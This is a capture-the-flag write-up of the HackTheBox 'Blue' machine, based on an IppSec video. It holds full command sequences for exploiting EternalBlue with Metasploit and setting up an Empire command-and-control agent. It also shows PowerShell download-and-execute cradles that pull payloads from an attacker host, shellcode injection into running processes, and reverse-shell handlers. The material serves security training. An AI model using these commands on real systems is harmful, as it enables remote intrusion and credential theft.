Blue Hackthebox

Disassembly of IppSec’s YouTube video HackTheBox - Blue: a crash course in nmap and the strength it has in enumeration, an exploitation crash course with Metasploit & Empire, fixing Unicode issues in a script with xxd, and using unicorn to elevate a meterpreter shell to the full stdapi.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.

This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting techniques and help solidify the understanding of the methodologies used during penetration testing.

Enumeration

nmap -sC -sV -oA nmap-scripts 10.10.10.40

-sC = default scripts
-sV = enumerate versions
-oA = output all formats
nmap-scripts = saves the results to files named nmap-scripts

The Microsoft security bulletin for EternalBlue is MS17-010: the flaw allows an attacker to send a crafted SMB message to the service and execute remote code.

More information can be found on the Microsoft security page: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

searching for the MS17-010 nmap script

At first, searching the box for “lue” (unsure whether the script name uses a lowercase b or an uppercase B) and grepping for the nmap script extension “.nse$”, then switching to search for the vulnerability identifier and grepping for the extension again.

Discovered the script exists at /usr/share/nmap/scripts/smb-vuln-ms17-010.nse

inspecting the nmap script

Moving on to inspect the script and verify that its categories do include “safe”:

less /usr/share/nmap/scripts/smb-vuln-ms17-010.nse

nmap scanning all “safe” scripts

To scan with all safe scripts against a target:

nmap -p 445 --script safe -Pn -n 10.10.10.40

-Pn = disable ping
-n = disable DNS resolution

Running safe scripts will take quite a bit of time as it runs multiple scripts against the target.

searching nmap scripts & sorting

To find out what all the “categories” are in the nmap script folder:

grep -r categories /usr/share/nmap/scripts/*.nse

If we just want to see the “categories”, we can search for everything between quotes:

grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"'

Sorting this list with sort (-u also removes duplicates):

grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u

This is a list of all the types of scripts available with nmap.

To grab just one “category” from above and show the scripts in it (the awk delimiter is the colon grep puts between file name and match):

grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F: '{print $1}'

Lists all the “default” scripts; “default” can be changed for any of the above types.
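The same category search as reusable functions, as an added example (not from the write-up or from IppSec): it runs against a constructed sample directory so it works without nmap installed, and can be pointed at /usr/share/nmap/scripts for the real scripts.

```shell
# Added example, not part of the original write-up: the grep | grep -o | sort -u
# pipeline above, wrapped in functions. Run against constructed sample .nse
# files so it works anywhere; pass /usr/share/nmap/scripts to use real scripts.

# Create a few stand-in .nse files carrying only a "categories" line
# (constructed metadata, not the real scripts' contents).
make_sample_scripts() {
  dir="$1"; mkdir -p "$dir"
  printf 'categories = {"vuln", "safe"}\n'                 > "$dir/smb-vuln-ms17-010.nse"
  printf 'categories = {"default", "discovery", "safe"}\n' > "$dir/http-title.nse"
  printf 'categories = {"intrusive", "brute"}\n'           > "$dir/smb-brute.nse"
}

# Every category name used by any script in $1, one per line, deduplicated.
# '"[^"]*"' is the POSIX grep equivalent of the -oP '".*?"' used above.
list_categories() {
  grep -h categories "$1"/*.nse | grep -o '"[^"]*"' | tr -d '"' | sort -u
}

# File names of the scripts in $1 that list category $2.
scripts_in_category() {
  grep -l "\"$2\"" "$1"/*.nse | sed 's#.*/##' | sort
}

# Exit status 0 if script $1 is tagged "safe" (what the less check verified).
is_safe() {
  grep -q '"safe"' "$1"
}

# Demo on the constructed directory.
demo=$(mktemp -d)
make_sample_scripts "$demo"
echo "categories:";   list_categories "$demo"
echo "safe scripts:"; scripts_in_category "$demo" safe
```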

return to the results from the “safe” nmap scan

There is quite a bit of information that was returned.

The scan returns the EternalBlue “ms17-010” check as “VULNERABLE”.

nmap with “vuln and safe”

To narrow this “safe” enumeration to scripts that are also in the “vuln” category:

nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40

Exploiting

Metasploit

I know of two ways to launch Metasploit:

msfdb run # loads the postgres server as well.
msfconsole # standard launching

Search for EternalBlue - ms17-010:

search ms17-010

Use exploit:

use exploit/windows/smb/ms17_010_eternalblue

Show options:

show options

Set payload:

set payload windows/x64/meterpreter/reverse_tcp

Set LHOST:

set LHOST tun0

Set RHOST to the target (10.10.10.40):

set RHOST 10.10.10.40

Exploit:

exploit -j

Meterpreter session opened!

List all sessions:

sessions -l

Interact with session 1 and drop to a shell:

sessions -i 1
shell

EMPIRE Framework

Empire is a post-exploitation Windows tool.

In a directory of choice, here /opt/Empire:

git clone https://github.com/EmpireProject/Empire -b dev

The development branch is recommended as it has better quality-of-life improvements.

install empire

Change directory to /setup and execute install.sh:

./install.sh

Hit [enter] for random password generation.

execute empire

From /opt/Empire:

./empire

Run help to see all the commands available.

setup listeners

This is the first command always run:

listeners

uselistener # tab a few times to see all the types of listeners

using the “http” listener

uselistener http

Run info - similar to show options in msf:

info

We need to change the Host and Port:

set Host http://10.10.14.16:443
set Port 443

10.10.14.16 is the local IP; port 443 is normally allowed outbound through firewalls.

To start the listener:

execute

Back out of the listener:

back

generate powershell payload

launcher powershell http

On the local box make a directory called /http and create a file named empire.ps1:

vi empire.ps1

Paste the PowerShell output.

using stagers

Alternatively, like launchers, there are stagers:

usestager

We have duck, hta, bat, vbs, macro and macroless_msword files.

sending empire.ps1

Set up a local HTTP server:

python -m SimpleHTTPServer 80

From the target's meterpreter shell, download the file (10.10.14.16 is the local box):

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/empire.ps1')"

Verified that the file was served from the local web server.

Back out to the main menu and list agents:

back
agents

Our target machine is now hooked. Empire is different in that the agent only contacts the “mothership” to retrieve commands each time its delay elapses.

To change the frequency/delay:

sleep
sleep all 1
agents

interacting with agents

interact M9N3T5HS

usemodule (tab x2) lists all available modules:

usemodule

empire privesc module

usemodule privesc/

usemodule privesc/powerup/allchecks
execute

The job will start once the agent calls back to the “mothership” Empire C2 server, and the results will show in the window when it has finished.

mimikatz module

Head back one level and run help:

back
help

Alternatively, use searchmodule:

searchmodule mimikatz

The results are mainly under credentials.

display empire running jobs

jobs

Awaiting the return of “allchecks”.

adding modules to Empire

For instance, if you wanted to run Sherlock.ps1 from @_Rastamouse, GitHub link: https://github.com/rasta-mouse/Sherlock

fixing unicode on a ps1 file

The Unicode issue exists on the first line of the file.

Use xxd to create a hex version of Sherlock.ps1:

xxd -ps Sherlock.ps1 > Sherlock.ps1.hex

vi Sherlock.ps1.hex

Delete the first 6 characters (the first three bytes of the file).

Convert the hex back to a ps1:

xxd -r -ps Sherlock.ps1.hex > Sherlock.ps1

less Sherlock.ps1

The Unicode issue has been resolved.
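The three bytes behind those “first 6 characters” are the UTF-8 byte-order mark EF BB BF. As an added example (not from the write-up or from IppSec), this does the same fix with POSIX od and tail instead of hand-editing the hex dump, and checks first whether a BOM is actually there; the sample file is constructed and stands in for Sherlock.ps1.

```shell
# Added example, not part of the original write-up: detect and strip a UTF-8
# byte-order mark (EF BB BF) from a .ps1 file. Those three bytes are the
# "first 6 characters" deleted from the xxd hex dump above.

# Print the first three bytes of file $1 as lowercase hex, no spaces.
head_hex() {
  od -A n -t x1 -N 3 "$1" | tr -d ' \n'
}

# Copy $1 to $2, dropping a leading UTF-8 BOM if one is present.
# Prints "bom-stripped" or "no-bom" so the caller can tell which happened.
strip_bom() {
  in="$1"; out="$2"
  if [ "$(head_hex "$in")" = "efbbbf" ]; then
    tail -c +4 "$in" > "$out"   # copy from byte 4 onwards: everything after the BOM
    echo "bom-stripped"
  else
    cp "$in" "$out"
    echo "no-bom"
  fi
}

# Demo on a constructed file (stand-in for Sherlock.ps1): BOM + a one-line function.
demo_dir=$(mktemp -d)
printf '\357\273\277function Find-AllVulns { "demo" }\n' > "$demo_dir/bom.ps1"
echo "before: $(head_hex "$demo_dir/bom.ps1")"        # efbbbf
strip_bom "$demo_dir/bom.ps1" "$demo_dir/clean.ps1"   # bom-stripped
echo "after:  $(head_hex "$demo_dir/clean.ps1")"      # 66756e, i.e. "fun"
```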

return to invoke “allchecks”

results from the “allchecks”

Returned a significant number of results, as we are already SYSTEM through the exploit.

lost limit

This feature keeps trying to connect to the agent, and if contact is lost for the specified time the agent will uninstall itself.

Normally set to 4440, which is about 24 hours.

scriptcmd & scriptimport

scriptcmd executes a function that has previously been imported, and scriptimport sends a new PowerShell script to the agent to keep in memory.

importing Sherlock.ps1

scriptimport /opt/win_privesc/Sherlock/Sherlock.ps1

Run Sherlock.ps1:

scriptcmd Find-AllVulns

Find-AllVulns is a function defined inside Sherlock.ps1.

(results)

pass an object from Empire to Metasploit

It was stated that at this point this might get a bit tricky. Create a new meterpreter listener within Empire:

uselistener meterpreter

Add the Host and Port and execute, then go back and interact with the previous session.

Re-set up Metasploit: ctrl+c to terminate the current session.

setup exploit handler

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
show options

Set LHOST and LPORT.

Back on Empire, issue a ps command to list processes:

ps

Pick a process running at the desired user level.

Head back to main and injectshellcode:

injectshellcode meterpreter 1824

1824 is the pid of the process we want to inject into.

Show info:

info

Set the payload and execute:

set Payload reverse_http
execute

On the Metasploit multi/handler a session is received.

seeing commands available

help

There should be a longer list of options to use, but it was stated that this version of the exploit doesn’t support x64 and is more geared toward x86 systems.

spawning 32bit process

Empire:

usemodule management/runas
info

set Cmd C:\windows\syswow64\cmd.exe

When attempting to execute, the framework asks for a Username or CredID.

IppSec’s workaround uses unicorn, GitHub link: https://github.com/trustedsec/unicorn

python unicorn.py --help

python unicorn.py windows/meterpreter/reverse_http 10.10.14.16 8002

In Metasploit, background the session, create a 32-bit handler and change the LPORT:

set payload windows/meterpreter/reverse_http
set LPORT 8002
exploit -j

In Empire, injectshellcode with the 32-bit listener, changing the Port and Host.

Back out and interact with the agent:

injectshellcode meterpreter1 2992
info

Set LPORT as 8002.

Successful response back to Metasploit.

Interact with session 3:

sessions -i 3

help

We still don’t have the standard API, but we can attempt to load it manually:

load stdapi

msf crashes at this point.

unicorn for the full stdapi

Pivot to unicorn, which outputs a file called powershell_attack.txt.

Send this file to our target with a SimpleHTTPServer:

cp /opt/unicorn/powershell_attack.txt .

In Empire, head back and use the command “shell”, which runs PowerShell commands:

shell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.16/powershell_attack.txt')

The connection is established.

Background session 3 (ctrl+c) and enter session 4:

sessions -i 4

At this point we have full standard API functionality with all the bells and whistles.


If you don’t know who IppSec is, check him out at https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Twitter: https://twitter.com/ippsec